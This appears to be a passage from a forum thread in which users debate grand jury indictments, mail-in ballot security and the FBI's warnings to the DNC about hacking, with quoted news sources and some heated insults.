For potential felony charges, a prosecutor will present the evidence to an impartial group of citizens called a grand jury. Witnesses may be called to testify, evidence is shown to the grand jury, and an outline of the case is presented to the grand jury members. The grand jury listens to the prosecutor and witnesses, and then votes in secret on whether they believe that enough evidence exists to charge the person with a crime. A grand jury may decide not to charge an individual based upon the evidence, no indictment would come from the grand jury. All proceedings and statements made before a grand jury are sealed, meaning that only the people in the room have knowledge about who said what about whom. The grand jury is a constitutional requirement for certain types of crimes (meaning it is written in the United States Constitution) so that a group of citizens who do not know the defendant can make an unbiased decision about the evidence before voting to charge an individual with a crime.

Grand juries are made up of approximately 16-23 members. Their proceedings can only be attended by specific persons. For example, witnesses who are compelled to testify before the grand jury are not allowed to have an attorney present. At least twelve jurors must concur in order to issue an indictment.

The federal courthouse in Minneapolis is one of the venues for the District of Minnesota

 

 

Unsealing GJ Testimony is illegal. The witnesses get a lawyer, the defendant gets a lawyer, everything changes. An indictment might not mean anything.

[Brad_ATX 13,654]

40 minutes ago, I_M4_AU said:

That would work for the most vulnerable, say 60+, otherwise social distance and wear a mask.  Just too much room for nefarious activity.

There's really not though.  Each ballot gets mailed with a bar code coinciding with the voter's information.  Once that bar code is scanned into the system after being dropped off at a secure location, you're good.  Hard to fraudulently vote that way.

The state of Washington already uses a similar system as the one described.  No concerns or evidence of widespread voter fraud at all so far up there.  Opinion article, but the pertinent info is this:

"Washington's Republican Secretary of State released figures Monday on the 2018 election. Just 142 cases of improper voting out of 3.1 million ballots were referred to county sheriffs and prosecutors for legal action.

That's 0.004% of what was an energized electorate"

https://www.seattlepi.com/local/politics/article/wash-vote-by-mail-2018-improper-voting-released-15245906.php

[AUDub 11,131]

57 minutes ago, DKW 86 said:

Actually, you are right about this.
The FBI went to the Sierra Foxtrots at the DNC and told them, some as many as 6X, that there was malware on the server. 
The DNC did ZERO. Took no action at all. Not even PW resets.
I have no sympathy for people that are warned repeatedly and still do nothing and then want to have a whine and cheese party when what they were warned about blows up in their faces. But this is true. THE DNC WAS WARNED REPEATEDLY BY THE FBI BEFORE THE HACK BECAME FRONTPAGE NEWS. THEY DID ABSOLUTELY NOTHING. ZERO. COMPLETELY IGNORED THE FBI.

When you are this pathetic and you get blown up, well, it sucks to be you. 

https://www.thedailybeast.com/cheats/2016/12/13/dnc-blew-off-fbi-hack-warnings

https://www.cnn.com/2016/07/25/politics/democratic-convention-dnc-emails-russia/index.html

https://themoscowproject.org/collusion/fbi-informs-dnc-russian-hacking/

https://thehill.com/policy/national-security/313555-comey-fbi-did-request-access-to-hacked-dnc-servers

*** Going back to 2015, The FBI was telling the DNC they were being hacked. And they did nothing.

 

It was a big failure on both sides. The FBI shouldn't have been so low key about it, and should have been contacting the higher ups of the DNC (and when they found out, Crowdstrike was brought in) and the low level tech support dweeb shouldn't have been so flippant in his contact with the FBI regarding an issue above his pay grade. Said dweeb's testimony is what I linked above, by the way.

I wish I could say such occurrences are rare outside of this, but having worked in support, I know better. You've probably experienced it too. 

[I_M4_AU 7,762]

2 hours ago, Brad_ATX said:

There's really not though.  Each ballot gets mailed with a bar code coinciding with the voter's information.  Once that bar code is scanned into the system after being dropped off at a secure location, you're good.  Hard to fraudulently vote that way.

The state of Washington already uses a similar system as the one described.  No concerns or evidence of widespread voter fraud at all so far up there.  Opinion article, but the pertinent info is this:

"Washington's Republican Secretary of State released figures Monday on the 2018 election. Just 142 cases of improper voting out of 3.1 million ballots were referred to county sheriffs and prosecutors for legal action.

That's 0.004% of what was an energized electorate"

https://www.seattlepi.com/local/politics/article/wash-vote-by-mail-2018-improper-voting-released-15245906.php

I guess it depends on where you get your information:

Between 2012 and 2018, 28.3 million mail-in ballots remain unaccounted for, according to data from the federal Election Assistance Commission. The missing ballots amount to nearly one in five of all absentee ballots and ballots mailed to voters residing in states that do elections exclusively by mail.

States and local authorities simply have no idea what happened to these ballots since they were mailed – and the figure of 28 million missing ballots is likely even higher because some areas in the country, notably Chicago, did not respond to the federal agency’s survey questions. This figure does not include ballots that were spoiled, undeliverable, or came back for any reason.

A significant increase in mail-in voting this fall could greatly incentivize “ballot harvesting,” where third parties collect mail-in ballots on behalf of voters and deliver them to election officials. There’s long been a consensus that such a practice incentivizes fraud, and ballot harvesting is illegal in most of the country. Public debate over the issue has intensified in recent years after a GOP operative in North Carolina was indicted for crimes related to ballot harvesting in 2018.

https://www.realclearpolitics.com/articles/2020/04/24/28_million_mail-in_ballots_went_missing_in_last_four_elections_143033.html

To force states to come up with a mail-in system that do not have an established procedure for the sheer number of ballots it would entail just won’t work like Washington.  JMO

[AUDub 11,131]

4 hours ago, DKW 86 said:

An indictment is not a compelling piece of evidence. It is a request for charges to be brought. It is COMPLETELY unchallenged.

No, it is a formal charging document, not a request. It was true billed by a grand jury. 

Quote

No rules of evidence apply, none.
No rules of testifying. You cant even use some testimony used to get an indictment in the trial. 
No challenging any one about anything. 
No presence of the Defense there whatsoever. 
No Cross-examination.  

That's what the trial is for. 

But, once again, you thick skulled ninny, I'm weighing the evidence contained therein independent of the fact that it is an indictment. I'm not treating it like an indictment. That's you. Treat it like a report on findings of fact. The evidence you asked me to link is contained there.

4 hours ago, DKW 86 said:

COMPLETELY WRONG. Often, half or more of a case is built AFTER the Indictment. 
Do you realize that some or possibly even most evidence used in an Indictment might not be usable in a court of law???

Unsealing GJ Testimony is illegal. The witnesses get a lawyer, the defendant gets a lawyer, everything changes. An indictment might not mean anything.

Of course, but again, immaterial. Read the ******* thing. Weigh the evidence for yourself. Stop dismissing it hamhandedly. 

[Brad_ATX 13,654]

1 hour ago, I_M4_AU said:

I guess it depends on where you get your information:

Between 2012 and 2018, 28.3 million mail-in ballots remain unaccounted for, according to data from the federal Election Assistance Commission. The missing ballots amount to nearly one in five of all absentee ballots and ballots mailed to voters residing in states that do elections exclusively by mail.

States and local authorities simply have no idea what happened to these ballots since they were mailed – and the figure of 28 million missing ballots is likely even higher because some areas in the country, notably Chicago, did not respond to the federal agency’s survey questions. This figure does not include ballots that were spoiled, undeliverable, or came back for any reason.

A significant increase in mail-in voting this fall could greatly incentivize “ballot harvesting,” where third parties collect mail-in ballots on behalf of voters and deliver them to election officials. There’s long been a consensus that such a practice incentivizes fraud, and ballot harvesting is illegal in most of the country. Public debate over the issue has intensified in recent years after a GOP operative in North Carolina was indicted for crimes related to ballot harvesting in 2018.

https://www.realclearpolitics.com/articles/2020/04/24/28_million_mail-in_ballots_went_missing_in_last_four_elections_143033.html

To force states to come up with a mail-in system that do not have an established procedure for the sheer number of ballots it would entail just won’t work like Washington.  JMO

So what Washington does is have dedicated, drive thru drop off locations.  The voter is the one that drives up to the box, drops their sealed vote in, and moves on.  An election volunteer is there to confirm that everything runs smoothly.  Then the ballots are taken directly from that box to the vote counting facility.  Eliminates the possibility of votes being unaccounted for as they are under the control of the voter and then the state the entire time.